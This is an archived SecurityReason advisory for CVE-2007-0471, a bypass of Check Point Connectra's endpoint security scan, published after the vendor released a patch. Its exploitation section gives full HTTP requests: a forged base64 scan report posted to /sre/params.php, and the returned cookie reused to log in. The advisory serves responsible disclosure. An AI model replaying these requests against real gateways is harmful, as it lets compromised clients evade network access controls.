SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
Search :
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

Check Point Connectra End Point security bypass


Arrow  SecurityAlert : 2179
Arrow  CVE : CVE-2007-0471
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : Yes
Arrow  Exploit Given : No
Arrow  Credit : Roni Bachar and Nir Goldshlager
Arrow  Published : 26.01.2007

Arrow  Affected Software : Check Point Connectra NGX R62
Check Point Connectra NGX R61
Check Point Connectra NGX R60
Check Point Connectra 2.0
Check Point VPN-1 Power/UTM NGX R62
Check Point VPN-1 Power/UTM NGX R61
Check Point VPN-1 Power/UTM NGX R60
Check Point VPN-1 Power/UTM NG AI R55
Check Point VPN-1 Pro/Express NGX R62
Check Point VPN-1 Pro/Express NGX R61
Check Point VPN-1 Pro/Express NGX R60
Check Point VPN-1 Pro/Express NG AI R55



Arrow  Advisory Text :  

I. INTRODUCTION

Check Point Connectra is a complete Web Security Gateway that provides
SSL VPN access and comprehensive endpoint and integrated intrusion
prevention
Security in a single unified remote access solution. By combining both SSL
VPN connectivity and security in one solution, organizations can
effectively
deploy SSL VPNs Safely and securely to a diverse set of remote users while
ensuring the confidentiality and integrity of information that is critical
to the success of any business.

For more Information please refer to:
http://www.checkpoint.com/products/connectra/index.html

II. DESCRIPTION

One of the major things in Check Point Connectra is Comprehensive endpoint
security.
Before a client connects to the internal network a test is being done on
the
client to check if there is any security hazard on his computer. If a
hazard
is detected the user is prompted with the hazard details and asked to run
the test again before getting the ability to login to the network.

A bypass to this test has been detected by Roni Bachar and Nir
Goldshlager.
A user with a security hazard or a Trojan can bypass the end point
security
tests and login to the network with a security hazard on his computer.
The
bypass is being done by sending a "good" report to the /sre/params.php
page
after sending the report a set cookie will be send from the server to the
client. This cookie can be used to bypass the endpoint security findings.

The bypass was detected on the latest version of checkpoint connectra R62.

III. EXPLOITATION

The vulnerability can be exploited by doing the following stages:

Sending a post request as followed:

POST https://serverip/sre/params.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: ICS_Secure
Host: serverip
Content-Length: 251
Cache-Control: no-cache
Cookie: ICS_Test_Cookie=1

Report=PD94bWwgdmVyc2lvbj0iMS4wIj8+Cgo8U3JlU2NhblJlcG9ydCBWZXJzaW9uPSIzL
jcuM
TE2LjAiPgoJPFVzZXJJbmZvIFdpbkRvbWFpbj0iIiBXaW5Vc2VyPSJyb25pIiBXaW5Vc2VyQ
2F0Y
WxvZz0iQzpcRG9jdW1lbnRzIGFuZCBTZXR0aW5nc1xyb25pLkxFTk9WTy00RkZFRjRFMyIvP
go8L
1NyZVNjYW5SZXBvcnQ+Cg==

After sending the request a Set-Cookie will be received from the Check
Point
Connectra server

HTTP/1.1 200 OK
Date: Fri, 15 Dec 2006 17:16:19 GMT
Server: CPWS
Last-Modified: Fri, 15 Dec 2006 17:16:19 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: ICSCookie=ffbe7a3740e0db1c2d11b2c6b24c917d; expires=Tue, 13
Sep
2016 17:16:19 GMT; path=/; secure
Content-Length: 0
Content-Type: text/html

This ICSCookie is needed to be enteredd into the next request

GET https://serverip/Login/Login?LangCode= HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
1.1.4322; .NET CLR 2.0.50727)
Host: serverip
Connection: Keep-Alive
Cookie: CheckCookieSupport=1; ICSCookie=ffbe7a3740e0db1c2d11b2c6b24c917d

IV. WORKAROUND

Check point released a patch for this vulnerability.

V. DISCLOSURE TIMELINE

20.12.06 First Identification of the flaw
24.12.06 Reporting the flaw to checkpoint
27.12.06 Meeting checkpoint security stuff
22.01.07 Publishing the vulnerability.
22.01.07 Checkpoint Released a patch for the vulnerability

VI. CREDITS

The vulnerability was discovered by Roni Bachar and Nir Goldshlager.




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

Multiple Vendors libc/gdtoa printf(3) Array Overrun

Security Risk High- 2009-05-30

SecurityReason realised new advisory about vulnerabilities libc/gdtoa...

Apache RSS Apache Alert

» Apache Tomcat
   RequestDispatcher
   directory traversal
   vulnerability

» Apache mod_dav / svn
   Remote Denial of Service
   Exploit

» Apache Tomcat Information
   disclosure

» Apache Tomcat User
   enumeration vulnerability
   with FORM authentication

PHP RSS PHP Alert

» PHP 5.2.9 curl safe_mode
   & open_basedir bypass

» PHP 5.2.6 SAPI
   php_getuid() overload

» PHP
   ZipArchive::extractTo()
   Directory Traversal
   Vulnerability

» PHP 5.2.6 dba_replace()
   destroying file

Copyright © SecurityReason.com. All Rights Reserved.